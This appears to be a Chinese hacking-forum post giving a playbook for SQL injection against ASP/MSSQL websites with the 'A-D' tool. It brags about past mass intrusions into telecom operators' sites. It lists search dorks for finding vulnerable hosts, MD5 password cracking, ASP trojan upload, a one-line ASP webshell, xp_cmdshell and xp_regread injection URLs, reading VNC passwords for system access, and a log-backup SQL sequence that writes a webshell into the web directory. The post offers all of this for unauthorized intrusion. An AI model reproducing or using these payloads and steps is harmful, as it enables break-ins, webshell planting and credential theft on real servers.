安全界因为有了注入而疯狂,注入因为有了啊D更疯狂
去年九月份,联通,电信,移动,网通等电信运营商可谓被大家注入的是淋漓尽致,具体利用方法就是在啊D注入工具以 xxx inurl:Asp? 或inurl:XX.asp?id= 为关键字搜索存在漏洞的主机(对于单个域名的主机可以利用site:xxx.com inurl:asp 进行测试)
虽然电信他们早已把漏洞修补,但互联网确实还有不少存在注入漏洞的网站,而半数的主机为DB_ower权限。
文章不能百分之百让你入侵成功,只是提供思路增加你的成功概率!
一、通过漏洞地址直接破解数据库密码,然后翻出管理后台登陆。移动他们就是因为没有对管理员密码没有加密才使非法用户直接从后台登陆,对于扫不到后台的网站可以利用啊D的遍例目录来寻找后台。md5加密的可以到www.xmd5.org去查寻,挺方便的!对于不能遍便目录可以参阅《查找高难度网站后台》得到后台!
二、利用xp_treelist找到互联网访问目录,然后利用上传功能上传小型asp木马!列目录、上传是现在的注入工具必带的功能!
三、可以对注入地址的网站进行whois查询,得到是否存在其他网站。搜集相关信息仔细查看别的网站目录,在其他网站目录里寻找漏洞进行突破!再结合本文提到的方法进行提权!
四、管理员失职,在互联网访问目录里查找conn文件、文件夹或其他敏感文件、文件夹,看有没有备份的文件或其他可以通过http协议直接访问的敏感文件。如conn.asp.bak 此时就可以通过IE打开这个文件直接读取数据库连接地址!如偏偏一个比较隐藏的目录下 残留一个upfile.asp文件。
五、利用读取注册表信息读取敏感信息,如利用xp_regread读出VNC在注册表的加密密码,然后破解,直接拿到系统权限,前提对方必需装VNC服务!
六、getwebshell 插入一句话木马备份其数据库,如xiaolu的getwebshell,把一句话:<%execute request("godexp")%>插入客户端或其他一句话!成功率高!
七、利用DB权限专用的hdsi_cmd命令执行工具或教主hdsidos执命令配合使用,通过上面的注册表读取功能查看终端服务下的相关信息HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations执行添加Cmd命令,成功率不高但也不一定不行!
对于遍例目录,一般用啊D或其他注入工具就可以了,特殊情况下也可以IE里试一下下面的命令遍列目录:如果xp_cmdshell能够执行,我们可以用它来完成:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec master.dbo.xp_cmdshell ';dir c:\';;--
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec master.dbo.xp_cmdshell ';dir c:\ *.asp /s/a';;--,
通过xp_cmdshell我们可以看到所有想看到的,包括W3svc
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec master.dbo.xp_cmdshell ';cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc';
xp_fileexis,xp_getfiledetails,xp_dirtree,Xp_getnetname 看名字就应该知道它们的用途,pulick权限!
六、利用log备份获取WEBSHELL,这个也就是后来出来的啦,不明白的阅《导出日志文件到web目录来获得shell以及差异备分》
具体利用:alter database XXXX set RECOVERY FULL
create table cmd (a image)
backup log XXXX to disk = ’c:\Sammy’ with init
insert into cmd (a) values (’’)
backup log XXXX to disk = ’c:\xxx\2.asp’
如果大家有更好的思路,欢迎于我交流,谢谢!文章写的不好,请高手斧正!
-------------------------------------------------------------------------
哈哈 阎王的~~我丢上来了~ |